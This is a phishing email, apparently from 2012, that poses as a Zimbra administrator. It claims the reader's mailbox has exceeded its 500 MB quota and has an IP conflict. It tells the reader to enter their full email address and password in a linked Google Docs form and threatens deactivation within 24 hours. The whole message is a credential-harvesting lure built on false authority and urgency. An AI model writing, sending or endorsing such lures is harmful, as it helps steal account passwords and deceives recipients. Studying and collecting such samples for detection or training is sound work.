    SubjectNewsletter.

    Zimbra Account Warning

    This mail is from Zimbra Administrator; we wish to bring to your notice the Condition of your email account.

    We have just noticed that you have exceeded your email Database limit of 500 MB quota and your email IP is causing conflict because it is been accessed in different server location. You need to Upgrade and expand your Zimbra zimbra quota limit before you can continue to use your email.

    Update your email quota limit to 2.6 GB, use the below web link:

    https://docs.google.com/spreadsheet/viewform?formkey=dGcwUDc0aWczTnNtMnFaQU9NQVdFTEE6MQ

    and login your full email address. Example joe@yourdomain.com and password

    Failure to do this will result to email deactivation within 24hours

    Thank you for your understanding.
    Copyright ©2012 Zimbra Help Desk Technical Support Centre.